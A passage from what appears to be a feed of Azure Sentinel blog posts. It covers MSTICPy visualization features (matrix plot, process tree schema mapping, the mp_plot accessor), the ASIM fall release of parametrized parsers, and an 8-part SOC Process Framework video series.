graf--p">&nbsp;</P> <P class="graf graf--p">Note: MSI authentication is not currently support on AML compute.</P> <P class="graf graf--p">&nbsp;</P> <H3 class="graf graf--h4">Using Azure CLI as your default login&nbsp;method</H3> <P class="graf graf--p">As a side note to this, using an Azure CLI logon gives you many benefits, particularly when running multiple notebooks. Rather than have to authenticate for each notebook, the ChainedCredential flow will try to obtain an access token via the CLI session, giving you an effective single sign-on mechanism.</P> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">Due to its ability to cache credentials, we strongly recommend using Azure CLI logon. This allows all MSTICPy Azure functions to try to obtain current credentials from Azure CLI rather than initiate a new interactive authentication. This is especially helpful when using multiple Azure components or when running multiple notebooks. We recommend selecting <STRONG class="markup--strong markup--p-strong">cli </STRONG>and <STRONG class="markup--strong markup--p-strong">interactive </STRONG>for most cases.</P> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">To log in using Azure CLI from a notebook enter the following in a cell and run it:</P> <PRE class="graf graf--pre">!az login</PRE> <P class="graf graf--p graf--empty">&nbsp;</P> <P class="graf graf--p">You can read more about the <A class="markup--anchor markup--p-anchor" href="#" target="_blank" rel="noopener" data-href="#">Azure cloud and Azure authentication settings</A> in the MSTICPy documentation. If you have any requirements for cloud support not listed here please file an issue on our GitHub repo.</P> <P class="graf graf--p">&nbsp;</P> <H2 class="graf graf--h3">Matrix Plot</H2> <P class="graf graf--p">This is a new visualization for MSTICPy. It uses the Bokeh plotting library, which brings with it all of the interactivity common to our other visualizations.</P> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">We are indebted to Myriam and her <A class="markup--anchor markup--p-anchor" href="#" target="_blank" rel="noopener" data-href="#">CatScatter</A> article on <EM>Towards Data Science</EM> for the inspiration for this visualization.</P> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">The Matrix plot is designed to be used where you want to see interactions between two sets of data — either to see whether there was any interaction at all, or get a sense of how much (or how little) interaction there was.</P> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">A canonical example would be to view connections between sets of IP addresses. This is shown in the following screen shot where the size of each circle at the grid intersections is proportional to the number of connections recorded.</P> <P class="graf graf--p">&nbsp;</P> <FIGURE class="graf graf--figure"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="ianhelle_1-1631669321191.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/310467i49195585F1D4B1CB/image-size/large?v=v2&amp;px=999" role="button" title="ianhelle_1-1631669321191.png" alt="Matrix plot of communications between source and destination IP Addresses" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Matrix plot of communications between source and destination IP Addresses</span></span> <P>&nbsp;</P> <FIGCAPTION class="imageCaption"></FIGCAPTION> </FIGURE> <P class="graf graf--p">The syntax for creating a matrix plot is straightforward. Once you’ve loaded MSTICPy you can plot directly from a pandas DataFrame. You need to specify the “x” parameter (the horizontal axis) and the “y” parameter (vertical axis).</P> <P class="graf graf--p">&nbsp;</P> <PRE class="graf graf--pre">net_df.mp_plot.matrix(<BR /> x="SourceIP",<BR /> y="DestinationIP",<BR /> title="IP Interaction"<BR />)</PRE> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">By default, the circle size at the intersection of the x and y values is the number of interactions (i.e., the number of rows in the source data where the distinct x and y pairs appear).</P> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">There are several variations of the basic plot:</P> <UL class="postList"> <LI class="graf graf--li">Use a column in the input DataFrame to size the intersection circle, rather than a raw count (using the <CODE class="markup--code markup--li-code">value_col=column_name</CODE> parameter). The column must be a numeric value (an integer or float), for example BytesTransmitted.</LI> <LI class="graf graf--li">Scale the sizing (using <CODE class="markup--code markup--li-code">log_size=True</CODE>). This is useful to “flatten” the variations between different count values where these values are skewed.</LI> <LI class="graf graf--li">Invert the sizing. This plots the inverse of the interaction point value. It is particularly useful to highlight rare, rather than common interactions (using <CODE class="markup--code markup--li-code">invert=True</CODE>).</LI> <LI class="graf graf--li">Plot circle size using a count of distinct values for a named column (using <CODE class="markup--code markup--li-code">dist_count=column_name)</CODE>. The <EM class="markup--em markup--li-em">column_name </EM>column can be of any data type.</LI> <LI class="graf graf--li">Ignore sizing and plot a fixed-sized circle for any interaction between the x and y pairs. This is useful to be able to quickly see all interactions — using the default scaled circle size can result in some interaction points being very small and difficult to see.</LI> </UL> <P class="graf graf--p">The x and y columns don’t have to be interacting entities such as IP addresses or hosts. Either axis can be an arbitrary column from the source DataFrame. For example, you could plot <EM class="markup--em markup--p-em">Account</EM> on the y axis and <EM class="markup--em markup--p-em">ResourceIdentifier</EM> on the x axis to show how often a particular account accesses a resource.</P> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">There are a few more options controlling font sizes, title, axis sorting. You can read more in our online documentation describing the <A class="markup--anchor markup--p-anchor" href="#" target="_blank" rel="noopener" data-href="#">Matrix plot</A> in detail.</P> <P class="graf graf--p">&nbsp;</P> <H2 class="graf graf--h3">Process Tree Visualization</H2> <P class="graf graf--p">The <A class="markup--anchor markup--p-anchor" href="#" target="_blank" rel="noopener" data-href="#">process tree visualization</A> has been in MSTICPy for a while but it was closely bound to the Azure Sentinel data schema. We’ve reworked the process tree plotting and support libraries to be data source agnostic. We’ve also built specific support for MS Defender for Endpoint (MDE) process logs.</P> <P class="graf graf--p">&nbsp;</P> <H3 class="graf graf--h4">Making the process tree schema-agnostic</H3> <P class="graf graf--p">We’ve removed hard coded references to columns such as <EM class="markup--em markup--p-em">TenantId </EM>and <EM class="markup--em markup--p-em">TimeGenerated</EM>. For your data source, you need to create a dictionary that maps the following generic property names (<EM class="markup--em markup--p-em">InternalName </EM>column) to the columns in your data (<EM class="markup--em markup--p-em">DataSourceName</EM>). You can also use the <A class="markup--anchor markup--p-anchor" href="#" target="_blank" rel="noopener" data-href="#">ProcSchema</A> class to define your column mapping.</P> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">The example below shows the mapping for Linux auditd data read from Azure Sentinel.</P> <FIGURE class="graf graf--figure graf--iframe"> <DIV class="aspectRatioPlaceholder is-locked"> <DIV class="iframeContainer"> <TABLE style="height: 555px; border-style: solid; width: 100%;" border="1" width="100%"><CAPTION>&nbsp;</CAPTION> <TBODY> <TR> <TD width="12.5%" height="30px"><STRONG>InternalName</STRONG></TD> <TD width="12.5%" height="30px"><STRONG>Description</STRONG></TD> <TD width="25%" height="30px"><STRONG>DataSourceName</STRONG></TD> <TD width="25%" height="30px"><STRONG>Required</STRONG></TD> </TR> <TR> <TD width="12.5%" height="57px">process_name</TD> <TD width="12.5%" height="57px">Name/path of the created process</TD> <TD width="25%" height="57px">exe</TD> <TD width="25%" height="57px">Yes</TD> </TR> <TR> <TD width="12.5%" height="30px">process_id</TD> <TD width="12.5%" height="30px">Process ID</TD> <TD width="25%" height="30px">pid</TD> <TD width="25%" height="30px">Yes</TD> </TR> <TR> <TD width="12.5%" height="30px">parent_id</TD> <TD width="12.5%" height="30px">Parent process ID</TD> <TD width="25%" height="30px">ppid</TD> <TD width="25%" height="30px">Yes</TD> </TR> <TR> <TD width="12.5%" height="30px">logon_id</TD> <TD width="12.5%" height="30px">Logon/session ID</TD> <TD width="25%" height="30px">ses</TD> <TD width="25%" height="30px">No</TD> </TR> <TR> <TD width="12.5%" height="57px">cmd_line</TD> <TD width="12.5%" height="57px">Process command line</TD> <TD width="25%" height="57px">cmdline</TD> <TD width="25%" height="57px">Yes</TD> </TR> <TR> <TD width="12.5%" height="57px">user_name</TD> <TD width="12.5%" height="57px">Process account name</TD> <TD width="25%" height="57px">acct</TD> <TD width="25%" height="57px">Yes</TD> </TR> <TR> <TD width="12.5%" height="30px">path_separator</TD> <TD width="12.5%" height="30px">"\\" or "/"</TD> <TD width="25%" height="30px">"/"</TD> <TD width="25%" height="30px">No</TD> </TR> <TR> <TD width="12.5%" height="57px">host_name_column</TD> <TD width="12.5%" height="57px">Host running process</TD> <TD width="25%" height="57px">Computer</TD> <TD width="25%" height="57px">Yes</TD> </TR> <TR> <TD width="12.5%" height="30px">time_stamp</TD> <TD width="12.5%" height="30px">Process create time</TD> <TD width="25%" height="30px">TimeGenerated</TD> <TD width="25%" height="30px">Yes</TD> </TR> <TR> <TD width="12.5%" height="30px">parent_name</TD> <TD width="12.5%" height="30px">Parent name/path</TD> <TD width="25%" height="30px">&nbsp;</TD> <TD width="25%" height="30px">No</TD> </TR> <TR> <TD width="12.5%" height="57px">target_logon_id</TD> <TD width="12.5%" height="57px">Effective logon/session ID</TD> <TD width="25%" height="57px">&nbsp;</TD> <TD width="25%" height="57px">No</TD> </TR> <TR> <TD width="12.5%" height="30px">user_id</TD> <TD width="12.5%" height="30px">ID/SID of account</TD> <TD width="25%" height="30px">uid</TD> <TD width="25%" height="30px">No</TD> </TR> <TR> <TD width="12.5%" height="30px">event_id_column</TD> <TD width="12.5%" height="30px">Column in input data that identifies the event type (only needed if mixed events in data)</TD> <TD width="25%" height="30px">EventType</TD> <TD width="25%" height="30px">No</TD> </TR> <TR> <TD width="12.5%">event_id_identifier</TD> <TD width="12.5%">The value of event_id_column to use to filter only required events</TD> <TD width="25%">SYSCALL_EXECVE</TD> <TD width="25%">No</TD> </TR> </TBODY> </TABLE> </DIV> </DIV> <FIGCAPTION class="imageCaption"><BR />And here is an example of how to define a schema for your input data.<BR /><BR /></FIGCAPTION> </FIGURE> <PRE class="graf graf--pre">from msticpy.sectools.proc_tree_builder import ProcSchema<BR />my_schema = ProcSchema(<BR /> time_stamp="TimeGenerated",<BR /> process_name="exe",<BR /> process_id="pid",<BR /> ...<BR /> path_separator="/",<BR /> user_id="uid",<BR /> host_name_column="Computer",<BR />)<BR />lx_proc_df.mp_plot(schema=my_schema)</PRE> <H4 class="graf graf--h4">&nbsp;</H4> <H3 class="graf graf--h4">Using MDE process&nbsp;data</H3> <P class="graf graf--p">MDE process data contains groups of data for each process row:</P> <UL class="postList"> <LI class="graf graf--li">CreatedProcess attributes</LI> <LI class="graf graf--li">InitiatingProcess attributes (the parent of the CreatedProcess)</LI> <LI class="graf graf--li">InitiatingProcessParent attributes (the grandparent of CreateProcess)</LI> </UL> <P class="graf graf--p">MSTICPy process tree builder flattens this structure into a single process per row (with attributes) and adds a key that links the process to its parent process. In some cases, rows for the parent and grandparent processes are already in the input data set. Where these are missing, MSTICPy will infer these records from the <EM class="markup--em markup--p-em">InitiatingProcess </EM>and <EM class="markup--em markup--p-em">IntiatingProcessParent </EM>data in the child process row. Once this is done, the process tree is displayed. Some attributes are shown in the box for each process; more are available as “tooltips” as you hover over each process in the tree.</P> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">The process tree module will indentify MDE data from the columns present: you do not need to define a schema.</P> <P class="graf graf--p">&nbsp;</P> <FIGURE class="graf graf--figure"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="ianhelle_2-1631669321172.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/310468iB968EA1B2F1C86E3/image-size/large?v=v2&amp;px=999" role="button" title="ianhelle_2-1631669321172.png" alt="Process tree for MS Defender for Endpoint&nbsp;data" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Process tree for MS Defender for Endpoint&nbsp;data</span></span> <P>&nbsp;</P> <FIGCAPTION class="imageCaption"></FIGCAPTION> </FIGURE> <P class="graf graf--h3">&nbsp;</P> <H2 class="graf graf--h3">Uniform access to plotting from pandas DataFrames</H2> <P class="graf graf--p">We’ve consolidated the various plotting functions into a single accessor named <CODE class="markup--code markup--p-code">mp_plot</CODE>. This lets you access any of the MSTICPy main visualization functions from a DataFrame. These are:</P> <UL class="postList"> <LI class="graf graf--li">Event Timeline — <CODE class="markup--code markup--li-code">timeline</CODE></LI> <LI class="graf graf--li">Event Timeline values — <CODE class="markup--code markup--li-code">timeline_values</CODE></LI> <LI class="graf graf--li">Process Tree — <CODE class="markup--code markup--li-code">process_tree</CODE></LI> <LI class="graf graf--li">Event Duration — <CODE class="markup--code markup--li-code">timeline_duration</CODE></LI> <LI class="graf graf--li">Matrix Plot — <CODE class="markup--code markup--li-code">matrix</CODE></LI> </UL> <P class="graf graf--p">The syntax for all of these is similar. The accessor is loaded automatically if you run <CODE class="markup--code markup--p-code">init_notebook</CODE>. You can also load it manually using the following code.</P> <P class="graf graf--p">&nbsp;</P> <PRE class="graf graf--pre">from msticpy.vis import mp_pandas_plot</PRE> <P class="graf graf--p">&nbsp;</P> <P class="graf graf--p">Here are some examples of usage:</P> <PRE class="graf graf--pre">df_mde.mp_plot.process_tree(legend_col="CreatedProcessAccountName")<BR /><BR />net_df.mp_plot.matrix(<BR /> x="SourceIP",<BR /> y="DestinationIP",<BR /> title="IP Interaction"<BR />)<BR /><BR />net_df.mp_plot.timeline(<BR /> source_columns=["SourceIP", "DestinationIP"]<BR /> title="IP Timeline"<BR />)</PRE> <P class="graf graf--h3">&nbsp;</P> <H2 class="graf graf--h3">Conclusion</H2> <P class="graf graf--p">You can read more details on our documentation pages using the links provided in this article.</P> <P class="graf graf--p">You can also read the <A class="markup--anchor markup--p-anchor" href="#" target="_blank" rel="noopener" data-href="#">release notes</A> for details of all of the other fixes and minor changes in this release.</P> <P class="graf graf--p">Please let us know about any issues or feature requests on our <A class="markup--anchor markup--p-anchor" href="#" target="_blank" rel="noopener ugc nofollow noopener" data-href="#">GitHub repo</A>. If you like the package, please add a star to the repo (it means a lot&nbsp;<img class="lia-deferred-image lia-image-emoji" src="https://techcommunity.microsoft.com/html/@8341BD79091AF36AA2A09063B554B5CDhttps://techcommunity.microsoft.com/images/emoticons/smile_40x40.gif" alt=":smile:" title=":smile:" />)</P> <P class="graf graf--p">Enjoy!</P> Wed, 22 Sep 2021 16:17:46 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-notebooks-azure-cloud-support-new-visualizations/ba-p/2751268 ianhelle 2021-09-22T16:17:46Z Azure Sentinel Information Model Fall Release: Speed & Ease https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-information-model-fall-release-speed-amp-ease/ba-p/2749363 <P>Hello everyone,</P> <P>&nbsp;</P> <P>Last quarter we focused on Azure Sentinel Information Model (ASIM) foundations and defined schemas. This quarter we focused on making ASIM more useful to you:</P> <P>&nbsp;&nbsp;</P> <UL> <LI><STRONG>ASIM is now simpler and faster to deploy -</STRONG>&nbsp;you can now deploy all ASIM parsers in&nbsp;<A href="#" target="_blank" rel="noopener">a single, easy deploy</A>. And since it costs nothing, takes a minute, and, using query time technology, does not actually change your data, why not test drive? See the new&nbsp;<A href="#" target="_blank" rel="noopener">getting started guide</A>&nbsp;to get you going.</LI> </UL> <P>&nbsp;</P> <UL> <LI><STRONG>ASIM is now lightning fast -</STRONG>&nbsp;One of the concerns we keep hearing about ASIM is that using query time parsing can slow things down. To address this, we have designed&nbsp;<A href="#" target="_blank" rel="noopener">parametrized parsers</A>. Parametrized parsers let you pass filtering conditions to the parser itself, ensuring filtering precedes parsing, leading to a significant performance gain. In many cases, filtering using parser parameters will result in much better performance than using non-normalized data.&nbsp;</LI> </UL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px">The first schema to use parametrized parsers is the&nbsp;<A href="#" target="_blank" rel="noopener">DNS schema</A>. DNS is a high-volume source, and using optimized parsers enables the new normalized Threat Intelligence Analytics Rules (<A href="#" target="_blank" rel="noopener">Domains</A>, <A href="#" target="_blank" rel="noopener">IPs</A>) to match your TI to even the highest volume of DNS data. And with out-of-the-box optimized parsers for a wide variety of DNS servers and clients, including Windows DNS Server, InfoBlox, Cisco Umbrella, Corelight Zeek, Google Cloud DNS, and Sysmon, you get this detection across much more of your data.&nbsp;</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px">Join us to learn more about parametrized parsers in our <STRONG>upcoming webinar “Turbocharging ASIM: Making Sure Normalization Helps Performance Rather Than Impacting It”</STRONG> on Oct 6th. Register, as usual on&nbsp;<A href="#" target="_blank" rel="noopener">https://aka.ms/securitywebinars</A>.</P> <P>&nbsp;</P> <UL> <LI><STRONG>ASIM covers more scenarios –&nbsp;</STRONG>We released an updated&nbsp;<A href="#" target="_blank" rel="noopener">network, proxy, and IPS schema</A>. It now clearly document how to use the network schema to normalize&nbsp;<A href="#" target="_blank" rel="noopener">common network sources</A>&nbsp;such as Firewalls, Proxy Servers, Web Security Gateways, and Intrusion Preventions Systems (IPS). It also more closely adhere to the latest ASIM guidelines.</LI> </UL> <P>&nbsp;</P> <UL> <LI><STRONG>ASIM supports your sources</STRONG>&nbsp;– apart from ASIM harmonizing different sources, ASIM can help you analyze data from specific products, overcoming the limitation of the raw information. We now provide product-specific deployment for:</LI> <UL> <LI><A href="#" target="_blank" rel="noopener">Sysmon</A>&nbsp;– providing parsed and normalized events instead of the raw, hard to use Sysmon events. Also, it does not matter if you collected the Sysmon events locally to the Event table or used WEF from remote systems: ASIM will combine them all for you in a uniform, easy-to-use format.&nbsp;</LI> <LI>And we also support the upcoming&nbsp;<A href="#" target="_blank" rel="noopener">Sysmon for Linux</A>.</LI> <LI><A href="#" target="_self">Windows Events</A> – Seamlessly use Security Events, and the upcoming Windows Events collected using WEF using a single schema.&nbsp;&nbsp;</LI> <LI>Use&nbsp;<A href="#" target="_blank" rel="noopener">Microsoft Defender for IoT – Endpoint</A>&nbsp;to monitor your endpoints without learning a new event structure.</LI> </UL> </UL> <P>&nbsp;</P> <UL> <LI><STRONG>Interested? We have updated the documentation</STRONG>&nbsp;– to help you get value out of ASIM, we have extended and refreshed our documentation. We now have dedicated sections for&nbsp;<A href="#" target="_blank" rel="noopener">ASIM schemas</A>,&nbsp;<A href="#" target="_blank" rel="noopener">ASIM parsers</A>, and&nbsp;<A href="#" target="_blank" rel="noopener">ASIM-based content</A>. And don’t forget our ASIM&nbsp;<A href="#" target="_blank" rel="noopener">intro</A>&nbsp;and&nbsp;<A href="#" target="_blank" rel="noopener">deep dive</A>&nbsp;Webinars!</LI> </UL> <P>&nbsp;</P> <P data-unlink="true">Special thanks to&nbsp;Yaron Fruchtmann&nbsp;&nbsp;and&nbsp;Yuval Naor&nbsp;, who made all this possible.</P> <P>&nbsp;</P> <H2>Why normalization, and what is the <A href="#" target="_blank" rel="noopener">Azure Sentinel Information Model</A>?</H2> <P>Working with various data types and tables together presents a challenge. You must become familiar with many different data types and schemas, write and use a unique set of analytics rules, workbooks, and hunting queries for each, even for those that share commonalities (for example, DNS servers). Correlation between the different data types necessary for investigation and hunting is also tricky.</P> <P>The Azure Sentinel Information Model (ASIM) provides a seamless experience for handling various sources in uniform, normalized views. ASIM aligns with the&nbsp;<A href="#" target="_blank" rel="noopener">Open-Source Security Events Metadata (OSSEM)</A>&nbsp;common information model, promoting vendor agnostic, industry-wide normalization. ASIM:</P> <P>&nbsp;</P> <UL> <LI>Allows source agnostic content and solutions</LI> <LI>Simplifies analyst use of the data in sentinel workspaces</LI> </UL> <P>&nbsp;</P> <P>The current implementation is based on query time normalization using <A href="#" target="_blank" rel="noopener">KQL functions</A>. And includes the following:</P> <UL> <LI><STRONG><A href="#" target="_blank" rel="noopener">Normalized schemas</A></STRONG> cover standard sets of predictable event types that are easy to work with and build unified capabilities. The schema defines which fields should represent an event, a normalized column naming convention, and a standard format for the field values.</LI> <LI><STRONG><A href="#" target="_blank" rel="noopener">Parsers</A></STRONG>&nbsp;map existing data to the normalized schemas. Parsers are implemented using KQL functions.</LI> <LI><STRONG><A href="#" target="_blank" rel="noopener">Content for each normalized schema</A></STRONG>&nbsp;includes analytics rules, workbooks, hunting queries, and additional content. This content works on any normalized data without the need to create source-specific content.</LI> </UL> <P>&nbsp;</P> <P>Ofer Shezaf</P> <P>Principal Product Manager, Azure Sentinel</P> Wed, 15 Sep 2021 06:00:36 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-information-model-fall-release-speed-amp-ease/ba-p/2749363 Ofer_Shezaf 2021-09-15T06:00:36Z What's New: Azure Sentinel - SOC Process Framework 8 Part Video Series! https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-soc-process-framework-8-part-video/ba-p/2662791 <P><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="SOCProcessFrameworkVideoSeries.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305168i34254E35186BF16C/image-size/large?v=v2&amp;px=999" role="button" title="SOCProcessFrameworkVideoSeries.png" alt="SOCProcessFrameworkVideoSeries.png" /></span></P> <P>&nbsp;</P> <P>In this 8 part video series learn how to use the SOC Process Framework to manage your security team or Security Operations Center. You will hear expert level conversations about the development and implementation of security processes and procedures. This SOC-in-a-box approach provides easy to customize workflows and a standards-based framework to help you implement and continuously improve the multiple processes and procedures required by any modern security operations team.</P> <P>&nbsp;</P> <P>The SOC Process Framework Workbook is available in the Azure Sentinel Workbook Gallery:</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="WorkbookGallery.png" style="width: 593px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/308780i1FA3B1913649702F/image-size/large?v=v2&amp;px=999" role="button" title="WorkbookGallery.png" alt="WorkbookGallery.png" /></span></P> <P>&nbsp;</P> <P><STRONG style="font-family: inherit;">Video 1 of an 8 Part Video Series : SOC Process Framework – Overview of the SOC Process Framework</STRONG></P> <P><STRONG>Teaser</STRONG> – An introduction to the SOC Process Framework and why it was developed.</P> <P><STRONG>Message</STRONG> – A conversation between Rin Ure, author of the SOC Process Framework, and Mark Simos, Lead Cyber Security Architect, to provide an overview of the SOC Process Framework and its key components. Rin walks through this Azure Sentinel Workbook and provides information on how you can implement and customize it to implement and mature any sized security team or full-scale Security Operations Center, using industry standards and recommendations.</P> <DIV id="tinyMceEditorRin_Ure_0" class="mceNonEditable lia-copypaste-placeholder">&nbsp;</DIV> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Rin_Ure_2-1629747343989.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305188i7B75A4A9CC6615B3/image-size/medium?v=v2&amp;px=400" role="button" title="Rin_Ure_2-1629747343989.png" alt="Rin_Ure_2-1629747343989.png" /></span>&nbsp;<STRONG>Video 1 Link</STRONG> –&nbsp;<A href="#" target="_blank" rel="noopener">https://youtu.be/RnPMwy7AoS0</A>&nbsp;</P> <P>&nbsp;</P> <P><STRONG>Video 2 of an 8 Part Video Series : SOC Process Framework – High Level Topics</STRONG></P> <P><STRONG>Teaser</STRONG> – How to customize and get started with the SOC Process Framework.</P> <P><STRONG>Message</STRONG> – Rin discusses using the editing capabilities to customize the workbook. Topics include Internal Contacts, SOC Roles and Responsibilities, Tools and Resources, and the Microsoft Learn built-in resources.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Rin_Ure_3-1629747378837.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305189iEAE997E57C7D8F7F/image-size/medium?v=v2&amp;px=400" role="button" title="Rin_Ure_3-1629747378837.png" alt="Rin_Ure_3-1629747378837.png" /></span>&nbsp;<STRONG style="font-family: inherit;">Video 2 Link</STRONG><SPAN style="font-family: inherit;"> –&nbsp;<A href="#" target="_blank" rel="noopener">https://youtu.be/JYj2_0fF0PY</A>&nbsp;</SPAN></P> <P>&nbsp;</P> <P><STRONG>Video 3 of an 8 Part Video Series : SOC Process Framework – Incident Response Framework &amp; Procedures</STRONG></P> <P><STRONG>Teaser</STRONG> – Deep dive into the Incident Response Framework.</P> <P><STRONG>Message</STRONG> – Rin provides a detailed explanation of the Incident Response Framework, how to work an incident between support groups, and focusing on critical outcomes. Understand why it is necessary to use tags, comments, and bookmarks in the incident to speed up the investigation and ensure measurable KPIs. Learn about the importance of a Shift Log to ensure consistency between SOC teams and following an incident from response to remediation and recovery.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Rin_Ure_4-1629747400187.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305190iF4B61108B32E6498/image-size/medium?v=v2&amp;px=400" role="button" title="Rin_Ure_4-1629747400187.png" alt="Rin_Ure_4-1629747400187.png" /></span>&nbsp;<STRONG>Video 3 Link</STRONG> –&nbsp;<A href="#" target="_blank" rel="noopener">https://youtu.be/zmEmREqCRcY</A>&nbsp;</P> <P>&nbsp;</P> <P><STRONG>Video 4 of an 8 Part Video Series : SOC Process Framework – Analytical Processes &amp; Procedures</STRONG></P> <P><STRONG>Teaser</STRONG> – Processes and procedures required to improve incident response.</P> <P><STRONG>Message</STRONG> – Rin provides a rundown of the various SOC Analytical Processes and Procedures provided in the workbook. These procedures cover the ability to triage, investigate, and hunt.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Rin_Ure_5-1629747413201.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305191i7EA4114D26AB6868/image-size/medium?v=v2&amp;px=400" role="button" title="Rin_Ure_5-1629747413201.png" alt="Rin_Ure_5-1629747413201.png" /></span>&nbsp;<STRONG>Video 4 Link</STRONG> –&nbsp;<A href="#" target="_blank" rel="noopener">https://youtu.be/pgcMsv39090</A>&nbsp;</P> <P>&nbsp;</P> <P><STRONG>Video 5 of an 8 Part Video Series : SOC Process Framework – Operational Processes &amp; Procedures – Part A</STRONG></P> <P><STRONG>Teaser</STRONG> – Document and improve critical teamwork procedures (Part A).</P> <P><STRONG>Message</STRONG> – Learn about the core definition of operational processes and procedures for any sized security team. Define your service level agreements, criticality, and procedures for urgency and expedited escalation. Learn about some advanced features, such as search and investigation graph, to improve the investigation process.&nbsp; In this extended session you will also learn about using Microsoft Teams integration to automate the process and collaboration required for incident response. Rin walks through an example triage process, adding tags and custom status flags to improve the engineering process and automation capabilities.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Rin_Ure_6-1629747448198.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305192i1FC25FA5D09328B8/image-size/medium?v=v2&amp;px=400" role="button" title="Rin_Ure_6-1629747448198.png" alt="Rin_Ure_6-1629747448198.png" /></span>&nbsp;<STRONG>Video 5a Link</STRONG> –&nbsp;<A href="#" target="_blank" rel="noopener">https://youtu.be/J1uUSQTWskU</A>&nbsp;</P> <P>&nbsp;</P> <P><STRONG>Video 5 of an 8 Part Video Series : SOC Process Framework – Operational Processes &amp; Procedures – Part B</STRONG></P> <P><STRONG>Teaser</STRONG> – Document and improve critical teamwork procedures (Part B).</P> <P><STRONG>Message</STRONG> – Rin defines how SOC teams work on shifts and with other teams, create reports and use these insights to improve SOC processes and procedures to ensure strong teamwork and an optimal working environment for this business-critical capability.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Rin_Ure_7-1629747460653.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305193i3ADD5C54CDA68D48/image-size/medium?v=v2&amp;px=400" role="button" title="Rin_Ure_7-1629747460653.png" alt="Rin_Ure_7-1629747460653.png" /></span>&nbsp;<STRONG>Video 5b Link</STRONG> –&nbsp;<A href="#" target="_blank" rel="noopener">https://youtu.be/HE_sAiJXPqY</A>&nbsp;</P> <P>&nbsp;</P> <P><STRONG>Video 6 of an 8 Part Video Series : SOC Process Framework – Business Processes &amp; Procedures</STRONG></P> <P><STRONG>Teaser</STRONG> – Develop and improve the efficiency and efficacy of security operations.</P> <P><STRONG>Message</STRONG> – Learn about how to define and track business metrics using the SOC Efficiency Metrics workbook. Understand how Agile SOC Operations can drive continuous improvements to detection and response capabilities. This session also covers the need to document standards, policies, and processes, especially useful for compliance audits.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Rin_Ure_8-1629747474457.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305194iBFFF70B30E4E9D78/image-size/medium?v=v2&amp;px=400" role="button" title="Rin_Ure_8-1629747474457.png" alt="Rin_Ure_8-1629747474457.png" /></span>&nbsp;<STRONG>Video 6 Link</STRONG> –&nbsp;<A href="#" target="_blank" rel="noopener">https://youtu.be/gRwaqzo91XU</A>&nbsp;</P> <P>&nbsp;</P> <P><STRONG>Video 7 of an 8 Part Video Series : SOC Process Framework – Technology Processes &amp; Procedures</STRONG></P> <P><STRONG>Teaser</STRONG> – Define and improve the security technology design and architecture.</P> <P><STRONG>Message</STRONG> – Rin and Richard explain why and how to document design processes, technology architectures, identify technology owners, and review regularly to ensure optimal performance for security operations. This session also covers the importance of documenting best practices for developing rule queries, alert enrichment, incident creation and other core components of technology configuration.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Rin_Ure_9-1629747478191.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/305195iC8649D46BEAFC552/image-size/medium?v=v2&amp;px=400" role="button" title="Rin_Ure_9-1629747478191.png" alt="Rin_Ure_9-1629747478191.png" /></span>&nbsp;<STRONG>Video 7 Link</STRONG> –&nbsp;<A href="#" target="_blank" rel="noopener">https://youtu.be/CKNVFHchWh4</A>&nbsp;</P> <P>&nbsp;</P> <P><STRONG>Video 8 of an 8 Part Video Series : SOC Process Framework – SOC Actions</STRONG></P> <P><STRONG>Teaser</STRONG> – Dynamic provisioning of action steps for every incident using watchlists and an Automated Playbook.</P> <P><STRONG>Message</STRONG> – Rin provides a demonstration and walk-through guide for creating dynamic updates to incidents. This solution is created using a playbook and custom watchlists that can associate specific steps to each incident type as it is 